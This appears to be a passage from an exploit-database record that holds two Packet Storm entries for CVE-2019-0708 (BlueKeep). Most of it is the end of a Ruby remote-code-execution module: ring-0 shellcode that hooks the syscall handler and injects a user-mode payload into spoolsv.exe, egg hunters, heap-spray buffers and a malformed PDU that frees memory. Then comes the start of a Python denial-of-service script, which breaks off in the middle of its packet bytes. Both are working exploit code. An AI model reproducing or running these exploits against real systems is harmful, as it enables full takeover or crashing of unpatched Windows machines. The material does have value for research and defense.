assumes the address we're fixing up is at the end of the \n# instruction. 
This holds for 'lea' but if there are other fixups \n# later, this might need to change to account for specific instruction \n# encodings \nif reloc.type == :i32 \ninstr_offset = offset + 4 \nelsif reloc.type == :i16 \ninstr_offset = offset + 2 \nend \nencoded.fixup(target => encoded.export[target] - instr_offset) \nelse \nraise \"Unknown symbol '#{target}' while resolving relative offsets\" \nend \nend \nencoded.fill \nencoded.data \nend \n \n# The user mode payload has two parts. The first is an egg hunter that searches for \n# the kernel mode payload. The second part is the actual payload that's invoked in \n# user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel \n# and user mode payloads around the heap in different packets because we don't have \n# enough space to put them both in the same chunk. Given that code exec can result in \n# landing on the user land payload, the egg is used to go to a kernel payload. \ndef user_mode_payload \n \nasm = %Q^ \n_start: \nlea rcx, [rel _start] \nmov r8, 0x#{KERNELMODE_EGG.to_s(16)} \n_egg_loop: \nsub rcx, 0x#{CHUNK_SIZE.to_s(16)} \nsub rax, 0x#{CHUNK_SIZE.to_s(16)} \nmov rdx, [rcx - 8] \ncmp rdx, r8 \njnz _egg_loop \njmp rcx \n^ \negg_loop = assemble_with_fixups(asm) \n \n# The USERMODE_EGG is required at the start as well, because the exploit code \n# assumes the tag is there, and jumps over it to find the shellcode. \n[ \nUSERMODE_EGG, \negg_loop, \nUSERMODE_EGG, \npayload.raw \n].pack('<Qa*<Qa*') \nend \n \ndef kernel_mode_payload \n \n# Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya \n# \n# This shellcode was written originally for eternalblue exploits \n# eternalblue_exploit7.py and eternalblue_exploit8.py \n# \n# Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0) \n# \n# Note: \n# - The userland shellcode is run in a new thread of system process. \n# If userland shellcode causes any exception, the system process get killed. 
\n# - On idle target with multiple core processors, the hijacked system call \n# might take a while (> 5 minutes) to get called because the system \n# call may be called on other processors. \n# - The shellcode does not allocate shadow stack if possible for minimal shellcode size. \n# This is ok because some Windows functions do not require a shadow stack. \n# - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed. \n# Note: the Windows 8 version macros are removed below \n# - The userland payload MUST be appened to this shellcode. \n# \n# References: \n# - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info) \n# - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c \n \ndata_kapc_offset = 0x10 \ndata_nt_kernel_addr_offset = 0x8 \ndata_origin_syscall_offset = 0 \ndata_peb_addr_offset = -0x10 \ndata_queueing_kapc_offset = -0x8 \nhal_heap_storage = 0xffffffffffd04100 \n \n# These hashes are not the same as the ones used by the \n# Block API so they have to be hard-coded. 
\ncreatethread_hash = 0x835e515e \nkeinitializeapc_hash = 0x6d195cc4 \nkeinsertqueueapc_hash = 0xafcc4634 \npsgetcurrentprocess_hash = 0xdbf47c78 \npsgetprocessid_hash = 0x170114e1 \npsgetprocessimagefilename_hash = 0x77645f3f \npsgetprocesspeb_hash = 0xb818b848 \npsgetthreadteb_hash = 0xcef84c3e \nspoolsv_exe_hash = 0x3ee083d8 \nzwallocatevirtualmemory_hash = 0x576e99ea \n \nasm = %Q^ \nshellcode_start: \nnop \nnop \nnop \nnop \n; IRQL is DISPATCH_LEVEL when got code execution \n \npush rbp \n \ncall set_rbp_data_address_fn \n \n; read current syscall \nmov ecx, 0xc0000082 \nrdmsr \n; do NOT replace saved original syscall address with hook syscall \nlea r9, [rel syscall_hook] \ncmp eax, r9d \nje _setup_syscall_hook_done \n \n; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize \ncmp dword [rbp+#{data_origin_syscall_offset}], eax \nje _hook_syscall \n \n; save original syscall \nmov dword [rbp+#{data_origin_syscall_offset}+4], edx \nmov dword [rbp+#{data_origin_syscall_offset}], eax \n \n; first time on the target \nmov byte [rbp+#{data_queueing_kapc_offset}], 0 \n \n_hook_syscall: \n; set a new syscall on running processor \n; setting MSR 0xc0000082 affects only running processor \nxchg r9, rax \npush rax \npop rdx ; mov rdx, rax \nshr rdx, 32 \nwrmsr \n \n_setup_syscall_hook_done: \npop rbp \n \n;--------------------- HACK crappy thread cleanup -------------------- \n; This code is effectively the same as the epilogue of the function that calls \n; the vulnerable function in the kernel, with a tweak or two. \n \n; TODO: make the lock not suck!! 
\nmov rax, qword [gs:0x188] \nadd word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++ \nlea r11, [rsp+0b8h] \nxor eax, eax \nmov rbx, [r11+30h] \nmov rbp, [r11+40h] \nmov rsi, [r11+48h] \nmov rsp, r11 \npop r15 \npop r14 \npop r13 \npop r12 \npop rdi \nret \n \n;--------------------- END HACK crappy thread cleanup \n \n;======================================================================== \n; Find memory address in HAL heap for using as data area \n; Return: rbp = data address \n;======================================================================== \nset_rbp_data_address_fn: \n; On idle target without user application, syscall on hijacked processor might not be called immediately. \n; Find some address to store the data, the data in this address MUST not be modified \n; when exploit is rerun before syscall is called \n;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000] \n \n; ------ HACK rbp wasnt valid! \n \nmov rbp, #{hal_heap_storage} ; TODO: use some other buffer besides HAL heap?? 
\n \n; --------- HACK end rbp \n \n_set_rbp_data_address_fn_next: \n;shr rbp, 12 \n;shl rbp, 12 \n;sub rbp, 0x70 ; for KAPC struct too \nret \n \n;int 3 \n;call $+5 \n;pop r13 \nsyscall_hook: \nswapgs \nmov qword [gs:0x10], rsp \nmov rsp, qword [gs:0x1a8] \npush 0x2b \npush qword [gs:0x10] \n \npush rax ; want this stack space to store original syscall addr \n; save rax first to make this function continue to real syscall \npush rax \npush rbp ; save rbp here because rbp is special register for accessing this shellcode data \ncall set_rbp_data_address_fn \nmov rax, [rbp+#{data_origin_syscall_offset}] \nadd rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler \nmov [rsp+0x10], rax \n \n; save all volatile registers \npush rcx \npush rdx \npush r8 \npush r9 \npush r10 \npush r11 \n \n; use lock cmpxchg for queueing APC only one at a time \nxor eax, eax \nmov dl, 1 \nlock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl \njnz _syscall_hook_done \n \n;====================================== \n; restore syscall \n;====================================== \n; an error after restoring syscall should never occur \nmov ecx, 0xc0000082 \nmov eax, [rbp+#{data_origin_syscall_offset}] \nmov edx, [rbp+#{data_origin_syscall_offset}+4] \nwrmsr \n \n; allow interrupts while executing shellcode \nsti \ncall r3_to_r0_start \ncli \n \n_syscall_hook_done: \npop r11 \npop r10 \npop r9 \npop r8 \npop rdx \npop rcx \npop rbp \npop rax \nret \n \nr3_to_r0_start: \n; save used non-volatile registers \npush r15 \npush r14 \npush rdi \npush rsi \npush rbx \npush rax ; align stack by 0x10 \n \n;====================================== \n; find nt kernel address \n;====================================== \nmov r15, qword [rbp+#{data_origin_syscall_offset}] ; KiSystemCall64 is an address in nt kernel \nshr r15, 0xc ; strip to page size \nshl r15, 0xc \n \n_x64_find_nt_walk_page: \nsub r15, 0x1000 ; walk along page size \ncmp word [r15], 0x5a4d ; 'MZ' header \njne 
_x64_find_nt_walk_page \n \n; save nt address for using in KernelApcRoutine \nmov [rbp+#{data_nt_kernel_addr_offset}], r15 \n \n;====================================== \n; get current EPROCESS and ETHREAD \n;====================================== \nmov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR \nmov edi, #{psgetcurrentprocess_hash} \ncall win_api_direct \nxchg rcx, rax ; rcx = EPROCESS \n \n; r15 : nt kernel address \n; r14 : ETHREAD \n; rcx : EPROCESS \n \n;====================================== \n; find offset of EPROCESS.ImageFilename \n;====================================== \nmov edi, #{psgetprocessimagefilename_hash} \ncall get_proc_addr \nmov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f) \nmov ebx, eax ; ebx = offset of EPROCESS.ImageFilename \n \n \n;====================================== \n; find offset of EPROCESS.ThreadListHead \n;====================================== \n; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+) \n; if offset of ImageFilename is more than 0x400, current is (Win8+) \n \ncmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename \njb _find_eprocess_threadlist_offset_win7 \nadd eax, 0x10 \n_find_eprocess_threadlist_offset_win7: \nlea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead \n \n;====================================== \n; find offset of ETHREAD.ThreadListEntry \n;====================================== \n \nlea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead \nmov r9, r8 \n \n; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700 \n_find_ethread_threadlist_offset_loop: \nmov r9, qword [r9] \n \ncmp r8, r9 ; check end of list \nje _insert_queue_apc_done ; not found !!! 
\n \n; if (r9 - r14 < 0x700) found \nmov rax, r9 \nsub rax, r14 \ncmp rax, 0x700 \nja _find_ethread_threadlist_offset_loop \nsub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry) \n \n \n;====================================== \n; find offset of EPROCESS.ActiveProcessLinks \n;====================================== \nmov edi, #{psgetprocessid_hash} \ncall get_proc_addr \nmov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f) \nadd edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId) \n \n \n;====================================== \n; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock \n;====================================== \n; check process name \n \n \nxor eax, eax ; HACK to exit earlier if process not found \n \n_find_target_process_loop: \nlea rsi, [rcx+rbx] \n \npush rax \ncall calc_hash \ncmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\" \npop rax \njz found_target_process \n \n;---------- HACK PROCESS NOT FOUND start ----------- \ninc rax \ncmp rax, 0x300 ; HACK not found! \njne _next_find_target_process \nxor ecx, ecx \n; clear queueing kapc flag, allow other hijacked system call to run shellcode \nmov byte [rbp+#{data_queueing_kapc_offset}], cl \n \njmp _r3_to_r0_done \n \n;---------- HACK PROCESS NOT FOUND end ----------- \n \n_next_find_target_process: \n; next process \nmov rcx, [rcx+rdi] \nsub rcx, rdi \njmp _find_target_process_loop \n \n \nfound_target_process: \n; The allocation for userland payload will be in KernelApcRoutine. \n; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess() \n \n;====================================== \n; save process PEB for finding CreateThread address in kernel KAPC routine \n;====================================== \nmov edi, #{psgetprocesspeb_hash} \n; rcx is EPROCESS. no need to set it. 
\ncall win_api_direct \nmov [rbp+#{data_peb_addr_offset}], rax \n \n \n;====================================== \n; iterate ThreadList until KeInsertQueueApc() success \n;====================================== \n; r15 = nt \n; r14 = -(offset of ETHREAD.ThreadListEntry) \n; rcx = EPROCESS \n; edx = offset of EPROCESS.ThreadListHead \n \n \nlea rsi, [rcx + rdx] ; rsi = ThreadListHead address \nmov rbx, rsi ; use rbx for iterating thread \n \n; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset. \n; Moreover, alertable thread need to be waiting state which is more difficult to check. \n; try queueing APC then check KAPC member is more reliable. \n \n_insert_queue_apc_loop: \n; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front \nmov rbx, [rbx+8] \n \ncmp rsi, rbx \nje _insert_queue_apc_loop ; skip list head \n \n; find start of ETHREAD address \n; set it to rdx to be used for KeInitializeApc() argument too \nlea rdx, [rbx + r14] ; ETHREAD \n \n; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer. \n; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL. \n; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer. \n; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL. \n; Teb member is next to Queue member. 
\nmov edi, #{psgetthreadteb_hash} \ncall get_proc_addr \nmov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f) \ncmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL \nje _insert_queue_apc_loop \n \n; KeInitializeApc(PKAPC, \n; PKTHREAD, \n; KAPC_ENVIRONMENT = OriginalApcEnvironment (0), \n; PKKERNEL_ROUTINE = kernel_apc_routine, \n; PKRUNDOWN_ROUTINE = NULL, \n; PKNORMAL_ROUTINE = userland_shellcode, \n; KPROCESSOR_MODE = UserMode (1), \n; PVOID Context); \nlea rcx, [rbp+#{data_kapc_offset}] ; PAKC \nxor r8, r8 ; OriginalApcEnvironment \nlea r9, [rel kernel_kapc_routine] ; KernelApcRoutine \npush rbp ; context \npush 1 ; UserMode \npush rbp ; userland shellcode (MUST NOT be NULL) \npush r8 ; NULL \nsub rsp, 0x20 ; shadow stack \nmov edi, #{keinitializeapc_hash} \ncall win_api_direct \n; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later \n \n; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0); \n; SystemArgument1 is second argument in usermode code (rdx) \n; SystemArgument2 is third argument in usermode code (r8) \nlea rcx, [rbp+#{data_kapc_offset}] \n;xor edx, edx ; no need to set it here \n;xor r8, r8 ; no need to set it here \nxor r9, r9 \nmov edi, #{keinsertqueueapc_hash} \ncall win_api_direct \nadd rsp, 0x40 \n; if insertion failed, try next thread \ntest eax, eax \njz _insert_queue_apc_loop \n \nmov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry \n; EPROCESS pointer 8 bytes \n; InProgressFlags 1 byte \n; KernelApcPending 1 byte \n; if success, UserApcPending MUST be 1 \ncmp byte [rax+0x1a], 1 \nje _insert_queue_apc_done \n \n; manual remove list without lock \nmov [rax], rax \nmov [rax+8], rax \njmp _insert_queue_apc_loop \n \n_insert_queue_apc_done: \n; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine. 
\n \n_r3_to_r0_done: \npop rax \npop rbx \npop rsi \npop rdi \npop r14 \npop r15 \nret \n \n;======================================================================== \n; Call function in specific module \n; \n; All function arguments are passed as calling normal function with extra register arguments \n; Extra Arguments: r15 = module pointer \n; edi = hash of target function name \n;======================================================================== \nwin_api_direct: \ncall get_proc_addr \njmp rax \n \n \n;======================================================================== \n; Get function address in specific module \n; \n; Arguments: r15 = module pointer \n; edi = hash of target function name \n; Return: eax = offset \n;======================================================================== \nget_proc_addr: \n; Save registers \npush rbx \npush rcx \npush rsi ; for using calc_hash \n \n; use rax to find EAT \nmov eax, dword [r15+60] ; Get PE header e_lfanew \nmov eax, dword [r15+rax+136] ; Get export tables RVA \n \nadd rax, r15 \npush rax ; save EAT \n \nmov ecx, dword [rax+24] ; NumberOfFunctions \nmov ebx, dword [rax+32] ; FunctionNames \nadd rbx, r15 \n \n_get_proc_addr_get_next_func: \n; When we reach the start of the EAT (we search backwards), we hang or crash \ndec ecx ; decrement NumberOfFunctions \nmov esi, dword [rbx+rcx*4] ; Get rva of next module name \nadd rsi, r15 ; Add the modules base address \n \ncall calc_hash \n \ncmp eax, edi ; Compare the hashes \njnz _get_proc_addr_get_next_func ; try the next function \n \n_get_proc_addr_finish: \npop rax ; restore EAT \nmov ebx, dword [rax+36] \nadd rbx, r15 ; ordinate table virtual address \nmov cx, word [rbx+rcx*2] ; desired functions ordinal \nmov ebx, dword [rax+28] ; Get the function addresses table rva \nadd rbx, r15 ; Add the modules base address \nmov eax, dword [rbx+rcx*4] ; Get the desired functions RVA \nadd rax, r15 ; Add the modules base address to get the functions actual VA \n \npop 
rsi \npop rcx \npop rbx \nret \n \n;======================================================================== \n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode. \n; \n; Argument: rsi = string to hash \n; Clobber: rsi \n; Return: eax = hash \n;======================================================================== \ncalc_hash: \npush rdx \nxor eax, eax \ncdq \n_calc_hash_loop: \nlodsb ; Read in the next byte of the ASCII string \nror edx, 13 ; Rotate right our hash value \nadd edx, eax ; Add the next byte of the string \ntest eax, eax ; Stop when found NULL \njne _calc_hash_loop \nxchg edx, eax \npop rdx \nret \n \n \n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context. \n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery(). \n; Moreover, there is no lock when calling KernelApcRoutine. \n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register. \n; \n; VOID KernelApcRoutine( \n; IN PKAPC Apc, \n; IN PKNORMAL_ROUTINE *NormalRoutine, \n; IN PVOID *NormalContext, \n; IN PVOID *SystemArgument1, \n; IN PVOID *SystemArgument2) \nkernel_kapc_routine: \npush rbp \npush rbx \npush rdi \npush rsi \npush r15 \n \nmov rbp, [r8] ; *NormalContext is our data area pointer \n \nmov r15, [rbp+#{data_nt_kernel_addr_offset}] \npush rdx \npop rsi ; mov rsi, rdx \nmov rbx, r9 \n \n;====================================== \n; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40) \n;====================================== \nxor eax, eax \nmov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires) \n; rdx is already address of baseAddr \nmov [rdx], rax ; baseAddr = 0 \nmov ecx, eax \nnot rcx ; ProcessHandle = -1 \nmov r8, rax ; ZeroBits \nmov al, 0x40 ; eax = 0x40 \npush rax ; PAGE_EXECUTE_READWRITE = 0x40 \nshl eax, 6 ; eax = 0x40 << 6 = 0x1000 \npush rax ; MEM_COMMIT = 0x1000 \n; reuse r9 for address of RegionSize \nmov [r9], rax ; RegionSize = 0x1000 \nsub 
rsp, 0x20 ; shadow stack \nmov edi, #{zwallocatevirtualmemory_hash} \ncall win_api_direct \nadd rsp, 0x30 \n \n; check error \ntest eax, eax \njnz _kernel_kapc_routine_exit \n \n;====================================== \n; copy userland payload \n;====================================== \nmov rdi, [rsi] \n \n;--------------------------- HACK IN EGG USER --------- \n \npush rdi \n \nlea rsi, [rel shellcode_start] \nmov rdi, 0x#{USERMODE_EGG.to_s(16)} \n \n_find_user_egg_loop: \nsub rsi, 0x#{CHUNK_SIZE.to_s(16)} \nmov rax, [rsi - 8] \ncmp rax, rdi \njnz _find_user_egg_loop \n \n_inner_find_user_egg_loop: \ninc rsi \nmov rax, [rsi - 8] \ncmp rax, rdi \njnz _inner_find_user_egg_loop \n \npop rdi \n;--------------------------- END HACK EGG USER ------------ \n \nmov ecx, 0x380 ; fix payload size to 0x380 bytes \n \nrep movsb \n \n;====================================== \n; find CreateThread address (in kernel32.dll) \n;====================================== \nmov rax, [rbp+#{data_peb_addr_offset}] \nmov rax, [rax + 0x18] ; PEB->Ldr \nmov rax, [rax + 0x20] ; InMemoryOrder list \n \n;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address \n;mov rbx, rsi ; use rbx for iterating thread \n_find_kernel32_dll_loop: \nmov rax, [rax] ; first one always be executable \n; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll) \n; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll) \n; offset 0x50 => is name \n; offset 0x20 => is dllbase \n;cmp word [rax+0x38], 0x40 \n;jne _find_kernel32_dll_loop \ncmp word [rax+0x48], 0x18 \njne _find_kernel32_dll_loop \n \nmov rdx, [rax+0x50] \n; check only \"32\" because name might be lowercase or uppercase \ncmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00 \njnz _find_kernel32_dll_loop \n \n;int3 \nmov r15, [rax+0x20] \nmov edi, #{createthread_hash} \ncall get_proc_addr \n \n; save CreateThread address to SystemArgument1 \nmov [rbx], rax \n \n_kernel_kapc_routine_exit: \nxor ecx, ecx \n; clear queueing kapc flag, 
allow other hijacked system call to run shellcode \nmov byte [rbp+#{data_queueing_kapc_offset}], cl \n; restore IRQL to APC_LEVEL \nmov cl, 1 \nmov cr8, rcx \n \npop r15 \npop rsi \npop rdi \npop rbx \npop rbp \nret \n \nuserland_start_thread: \n; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL) \nxchg rdx, rax ; rdx is CreateThread address passed from kernel \nxor ecx, ecx ; lpThreadAttributes = NULL \npush rcx ; lpThreadId = NULL \npush rcx ; dwCreationFlags = 0 \nmov r9, rcx ; lpParameter = NULL \nlea r8, [rel userland_payload] ; lpStartAddr \nmov edx, ecx ; dwStackSize = 0 \nsub rsp, 0x20 \ncall rax \nadd rsp, 0x30 \nret \n \nuserland_payload: \n^ \n \n[ \nKERNELMODE_EGG, \nassemble_with_fixups(asm) \n].pack('<Qa*') \nend \n \ndef create_free_trigger(chan_user_id, chan_id) \n# malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20) \nvprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\") \n# The extra bytes on the end of the body is what causes the bad things to happen \nbody = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22 \nrdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF) \nend \n \ndef create_exploit_channel_buffer(target_addr) \noverspray_addr = target_addr + 0x2000 \nshellcode_vtbl = target_addr + HEADER_SIZE \nmagic_value1 = overspray_addr + 0x810 \nmagic_value2 = overspray_addr + 0x48 \nmagic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE \n \n# first 0x38 bytes are used by DATA PDU packet \n# exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE \n# http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm \n[ \n[ \n# SystemResourceList (2 pointers, each 8 bytes) \n# Pointer to OWNER_ENTRY (8 bytes) \n# ActiveCount (SHORT, 2 bytes) \n# Flag (WORD, 2 bytes) \n# Padding (BYTE[4], 4 bytes) x64 only \n0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes) \n0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes) \nmagic_value2, # OwnerThread (ULONG, 
8 bytes) \nmagic_value2, # TableSize (ULONG, 8 bytes) \n0x0, # ActiveEntries (DWORD, 4 bytes) \n0x0, # ContenttionCount (DWORD, 4 bytes) \n0x0, # NumberOfSharedWaiters (DWORD, 4 bytes) \n0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes) \n0x0, # Reserved2 (PVOID, 8 bytes) x64 only \nmagic_value2, # Address (PVOID, 8 bytes) \n0x0, # SpinLock (UINT_PTR, 8 bytes) \n].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'), \n[ \nmagic_value2, # SystemResourceList (2 pointers, each 8 bytes) \nmagic_value2, # -------------------- \n0x0, # Pointer to OWNER_ENTRY (8 bytes) \n0x0, # ActiveCount (SHORT, 2 bytes) \n0x0, # Flag (WORD, 2 bytes) \n0x0, # Padding (BYTE[4], 4 bytes) x64 only \n0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes) \n0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes) \nmagic_value2, # OwnerThread (ULONG, 8 bytes) \nmagic_value2, # TableSize (ULONG, 8 bytes) \n0x0, # ActiveEntries (DWORD, 4 bytes) \n0x0, # ContenttionCount (DWORD, 4 bytes) \n0x0, # NumberOfSharedWaiters (DWORD, 4 bytes) \n0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes) \n0x0, # Reserved2 (PVOID, 8 bytes) x64 only \nmagic_value2, # Address (PVOID, 8 bytes) \n0x0, # SpinLock (UINT_PTR, 8 bytes) \n].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'), \n[ \n0x1F, # ClassOffset (DWORD, 4 bytes) \n0x0, # bindStatus (DWORD, 4 bytes) \n0x72, # lockCount1 (QWORD, 8 bytes) \nmagic_value3, # connection (QWORD, 8 bytes) \nshellcode_vtbl, # shellcode vtbl ? 
(QWORD, 8 bytes) \n0x5, # channelClass (DWORD, 4 bytes) \n\"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes) \n0x1F, # channelIndex (DWORD, 4 bytes) \nmagic_value1, # channels (QWORD, 8 bytes) \nmagic_value1, # connChannelsAddr (POINTER, 8 bytes) \nmagic_value1, # list1 (QWORD, 8 bytes) \nmagic_value1, # list1 (QWORD, 8 bytes) \nmagic_value1, # list2 (QWORD, 8 bytes) \nmagic_value1, # list2 (QWORD, 8 bytes) \n0x65756c62, # inputBufferLen (DWORD, 4 bytes) \n0x7065656b, # inputBufferLen (DWORD, 4 bytes) \nmagic_value1, # connResrouce (QWORD, 8 bytes) \n0x65756c62, # lockCount158 (DWORD, 4 bytes) \n0x7065656b, # dword15C (DWORD, 4 bytes) \n].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L') \n].join('') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/154579/cve_2019_0708_bluekeep_rce.rb.txt"}, {"lastseen": "2019-05-31T20:29:38", "description": "", "published": "2019-05-30T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Remote Desktop BlueKeep Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-05-30T00:00:00", "id": "PACKETSTORM:153133", "href": "https://packetstormsecurity.com/files/153133/Microsoft-Windows-Remote-Desktop-BlueKeep-Denial-Of-Service.html", "sourceData": "`import socket, sys, struct \nfrom OpenSSL import SSL \nfrom impacket.structure import Structure \n \n# I'm not responsible for what you use this to accomplish and should only be used for education purposes \n \n# Could clean these up since I don't even use them \nclass TPKT(Structure): \ncommonHdr = ( \n('Version','B=3'), \n('Reserved','B=0'), \n('Length','>H=len(TPDU)+4'), \n('_TPDU','_-TPDU','self[\"Length\"]-4'), \n('TPDU',':=\"\"'), \n) \n \nclass TPDU(Structure): \ncommonHdr = ( \n('LengthIndicator','B=len(VariablePart)+1'), \n('Code','B=0'), \n('VariablePart',':=\"\"'), \n) \ndef __init__(self, data = None): 
\nStructure.__init__(self,data) \nself['VariablePart']='' \n \nclass CR_TPDU(Structure): \ncommonHdr = ( \n('DST-REF','<H=0'), \n('SRC-REF','<H=0'), \n('CLASS-OPTION','B=0'), \n('Type','B=0'), \n('Flags','B=0'), \n('Length','<H=8'), \n) \n \nclass DATA_TPDU(Structure): \ncommonHdr = ( \n('EOT','B=0x80'), \n('UserData',':=\"\"'), \n) \ndef __init__(self, data = None): \nStructure.__init__(self,data) \nself['UserData'] ='' \n \nclass RDP_NEG_REQ(CR_TPDU): \nstructure = ( \n('requestedProtocols','<L'), \n) \ndef __init__(self,data=None): \nCR_TPDU.__init__(self,data) \nif data is None: \nself['Type'] = 1 \n \ndef send_init_packets(host): \ntpkt = TPKT() \ntpdu = TPDU() \nrdp_neg = RDP_NEG_REQ() \nrdp_neg['Type'] = 1 \nrdp_neg['requestedProtocols'] = 1 \ntpdu['VariablePart'] = rdp_neg.getData() \ntpdu['Code'] = 0xe0 \ntpkt['TPDU'] = tpdu.getData() \ns = socket.socket() \ns.connect((host, 3389)) \ns.sendall(tpkt.getData()) \ns.recv(8192) \nctx = SSL.Context(SSL.TLSv1_METHOD) \ntls = SSL.Connection(ctx,s) \ntls.set_connect_state() \ntls.do_handshake() \nreturn tls \n \n# This can be fixed length now buttfuckit \ndef send_client_data(tls): \np = 
\"\\x03\\x00\\x01\\xca\\x02\\xf0\\x80\\x7f\\x65\\x82\\x07\\xc2\\x04\\x01\\x01\\x04\\x01\\x01\\x01\\x01\\xff\\x30\\x19\\x02\\x01\\x22\\x02\\x01\\x02\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\\x30\\x19\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\x04\\x20\\x02\\x01\\x02\\x30\\x1c\\x02\\x02\\xff\\xff\\x02\\x02\\xfc\\x17\\x02\\x02\\xff\\xff\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\\x04\\x82\\x01\\x61\\x00\\x05\\x00\\x14\\x7c\\x00\\x01\\x81\\x48\\x00\\x08\\x00\\x10\\x00\\x01\\xc0\\x00\\x44\\x75\\x63\\x61\\x81\\x34\\x01\\xc0\\xea\\x00\\x0a\\x00\\x08\\x00\\x80\\x07\\x38\\x04\\x01\\xca\\x03\\xaa\\x09\\x04\\x00\\x00\\xee\\x42\\x00\\x00\\x44\\x00\\x45\\x00\\x53\\x00\\x4b\\x00\\x54\\x00\\x4f\\x00\\x50\\x00\\x2d\\x00\\x46\\x00\\x38\\x00\\x34\\x00\\x30\\x00\\x47\\x00\\x49\\x00\\x4b\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xca\\x01\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x0f\\x00\\xaf\\x07\\x62\\x00\\x63\\x00\\x37\\x00\\x38\\x00\\x65\\x00\\x66\\x00\\x36\\x00\\x33\\x00\\x2d\\x00\\x39\\x00\\x64\\x00\\x33\\x00\\x33\\x00\\x2d\\x00\\x34\\x00\\x31\\x00\\x39\\x38\\x00\\x38\\x00\\x2d\\x00\\x39\\x